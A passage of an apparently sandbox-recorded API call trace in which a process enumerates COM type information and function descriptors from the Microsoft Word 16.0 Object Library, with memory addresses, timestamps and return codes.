(This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x6, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x7, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x8, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0x9, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xa, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xb, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a861c0, index=0xc, ppFuncDesc=0x185b90, pDummy=0xf0 | out: ppFuncDesc=0x185b90, pDummy=0xf0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseFuncDesc (This=0x6a861c0) returned 0x0 [0041.327] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.327] IUnknown:Release (This=0x6a861c0) returned 0x3 [0041.327] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c32730 [0041.327] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c32610 [0041.327] IMalloc:Alloc (This=0x7feffc15380, cb=0x10) returned 0x6c326f0 [0041.327] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1854a8 | out: ppvObject=0x1854a8*=0x0) returned 0x80004002 [0041.328] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x1854a0, pDummy=0x10 | out: ppTypeAttr=0x1854a0, pDummy=0x10) returned 0x0 [0041.328] IUnknown:QueryInterface (in: This=0x6a861c0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185418 | out: ppvObject=0x185418*=0x0) returned 0x80004002 [0041.328] IUnknown:AddRef (This=0x6a861c0) returned 0x4 [0041.328] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x185410, pDummy=0x10 | out: ppTypeAttr=0x185410, pDummy=0x10) returned 0x0 [0041.328] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.328] IUnknown:Release (This=0x6a861c0) returned 0x3 [0041.328] strcpy_s (in: _Dst=0x6ca6238, _DstSize=0x9, _Src="Document" | out: _Dst="Document") returned 0x0 [0041.328] IMalloc:Alloc (This=0x7feffc15380, cb=0xc8) returned 0x6c2bc40 [0041.328] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a861c0, ppTypeAttr=0x1853d0, pDummy=0x6a861c0 | out: ppTypeAttr=0x1853d0, pDummy=0x6a861c0*=0xffe207b0) returned 0x0 [0041.328] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6a861c0, ppTLib=0x1853d8, pIndex=0x185418 | out: ppTLib=0x1853d8*=0x6992850, pIndex=0x185418*=0x20e) returned 0x0 [0041.329] ITypeLib:RemoteGetLibAttr (in: This=0x6992850, ppTLibAttr=0x1850c8, pDummy=0x0 | out: ppTLibAttr=0x1850c8, pDummy=0x0) returned 0x0 [0041.329] ITypeLib:RemoteGetDocumentation (in: This=0x6992850, index=-1, refPtrFlags=0x1850e0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x185130 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x185130) returned 0x0 [0041.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchWideChar=58, lpMultiByteStr=0x185150, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpUsedDefaultChar=0x0) returned 58 [0041.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x185260, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0041.329] ITypeLib:LocalReleaseTLibAttr (This=0x6992850) returned 0x0 [0041.329] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e63cb0 [0041.329] IMalloc:Alloc (This=0x7feffc15380, cb=0x230) returned 0x6ca6430 [0041.329] IUnknown:AddRef (This=0x6a861c0) returned 0x4 [0041.329] IUnknown:Release (This=0x6992850) returned 0xb [0041.329] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.329] ITypeInfo:LocalReleaseTypeAttr (This=0x6a861c0) returned 0x0 [0041.329] IUnknown:Release (This=0x6a86060) returned 0x1 [0041.329] IMalloc:Alloc (This=0x7feffc15380, cb=0x14) returned 0x6c327b0 [0041.329] IUnknown:Release (This=0x6a86060) returned 0x1 [0041.329] IMalloc:Realloc (This=0x7feffc15380, pv=0x0, cb=0x412) returned 0x3e64100 [0041.329] IMalloc:Free (This=0x7feffc15380, pv=0x6c327b0) [0041.330] IUnknown:QueryInterface (in: This=0x6a86060, riid=0x7fee45d40f0*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x186c88 | out: ppvObject=0x186c88*=0x6a86060) returned 0x0 [0041.330] ITypeInfo2:GetCustData (in: This=0x6a86060, GUID=0x7fee45dd970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x186c98 | out: pVarVal=0x186c98*(varType=0x0, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0041.330] IUnknown:Release (This=0x6a86060) returned 0x2 [0041.330] ITypeInfo:RemoteGetDocumentation (in: This=0x6a86060, memid=-1, refPtrFlags=0x186c90, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x186cb0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x186cb0*="") returned 0x0 [0041.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x186ba0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0041.330] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0041.330] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a86110, ppTypeAttr=0x186c90, pDummy=0x0 | out: ppTypeAttr=0x186c90, pDummy=0x0) returned 0x0 [0041.330] ITypeInfo:LocalReleaseTypeAttr (This=0x6a86110) returned 0x0 [0041.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x0, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.330] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.330] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.330] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.330] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x4, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.330] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x5, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.330] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x6, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.330] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x7, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.330] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.330] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x8, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x9, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xa, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xb, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xc, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xd, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xe, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0xf, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x10, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x11, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x12, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x13, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x14, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x15, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x16, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x17, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x18, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x19, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1a, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1b, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.331] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.331] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1c, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1d, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1e, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x1f, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x20, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x21, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x22, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x23, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x24, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x25, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x26, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x27, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x28, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x29, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2a, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2b, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2c, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2d, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2e, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x2f, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x30, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.332] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x31, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.332] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x32, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x33, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x34, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x35, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x36, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x37, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x38, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x39, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3a, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3b, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3c, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3d, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3e, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x3f, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x40, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x41, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x42, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x43, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x44, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x45, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.333] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.333] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x46, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x47, ppFuncDesc=0x186c68, pDummy=0x100 | out: ppFuncDesc=0x186c68, pDummy=0x100) returned 0x0 [0041.334] ITypeInfo:LocalReleaseFuncDesc (This=0x6a86110) returned 0x0 [0041.334] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a86110, index=0x48, 